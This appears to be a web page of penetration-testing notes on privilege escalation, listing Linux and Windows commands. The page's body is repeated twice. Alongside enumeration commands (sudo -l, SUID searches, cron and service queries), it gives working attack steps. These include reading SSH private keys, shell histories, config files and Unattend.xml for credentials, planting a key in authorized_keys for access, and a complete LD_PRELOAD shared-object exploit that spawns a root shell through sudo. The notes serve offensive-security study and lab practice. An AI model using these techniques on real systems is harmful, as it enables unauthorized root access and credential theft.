Privilege Escalation

Enumeration Scripts

Techniques

Kernel Exploits

You can google known kernel exploits.

Vulnerable Software

dpkg -l

dir C:\Program Files

User Privileges

sudo -l

find / -perm /4000 2>/dev/null

find / -perm /2000 2>/dev/null

find / -perm /6000 2>/dev/null

whoami /priv

whoami /all

Scheduled Tasks

/etc/crontab
/etc/cron.d
/var/spool/cron/crontabs/root

crontab -l

crontab -e

Exposed Credentials

cat ~/.bash_history

cat /var/www/html/config.php

SSH Keys

cat /home/qu35t/.ssh/id_rsa

ssh-keygen -t ed25519 -f qu35t

echo -n 'PUBLIC SSH KEY' > /home/qu35t/.ssh/authorized_keys

chmod 600 /home/qu35t/.ssh/authorized_keys

ssh -i qu35t qu35t@10.10.10.10

LD_PRELOAD

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
    unsetenv("LD_PRELOAD");
    setresuid(0,0,0);
    system("/bin/bash -p");
}

gcc -fPIC -shared -nostartfiles -o ./load.so ./ld.c

sudo LD_PRELOAD=/dev/shm/load.so /opt/script.sh

Windows

C:\Unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml

%userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

cmdkey /list

runas /savecred /user:admin cmd.exe

C:\inetpub\wwwroot\web.config

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config

schtasks /query /tn vulntask /fo list /v

icacls c:\tasks\schtask.bat

HKLM\SYSTEM\CurrentControlSet\Services\

sc qc apphostsvc

References

PreviousInfrastructure Enumeration NextDocker Breakout

Last updated 1 year ago

Techniques

Kernel Exploits

You can google known kernel exploits.

Vulnerable Software

dpkg -l

dir C:\Program Files

User Privileges

sudo -l

find / -perm /4000 2>/dev/null

find / -perm /2000 2>/dev/null

find / -perm /6000 2>/dev/null

whoami /priv

whoami /all

Scheduled Tasks

/etc/crontab
/etc/cron.d
/var/spool/cron/crontabs/root

crontab -l

crontab -e

Exposed Credentials

cat ~/.bash_history

cat /var/www/html/config.php

SSH Keys

cat /home/qu35t/.ssh/id_rsa

ssh-keygen -t ed25519 -f qu35t

echo -n 'PUBLIC SSH KEY' > /home/qu35t/.ssh/authorized_keys

chmod 600 /home/qu35t/.ssh/authorized_keys

ssh -i qu35t qu35t@10.10.10.10

LD_PRELOAD

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
    unsetenv("LD_PRELOAD");
    setresuid(0,0,0);
    system("/bin/bash -p");
}

gcc -fPIC -shared -nostartfiles -o ./load.so ./ld.c

sudo LD_PRELOAD=/dev/shm/load.so /opt/script.sh

Windows

C:\Unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml

%userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

cmdkey /list

runas /savecred /user:admin cmd.exe

C:\inetpub\wwwroot\web.config

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config

schtasks /query /tn vulntask /fo list /v

icacls c:\tasks\schtask.bat

HKLM\SYSTEM\CurrentControlSet\Services\

sc qc apphostsvc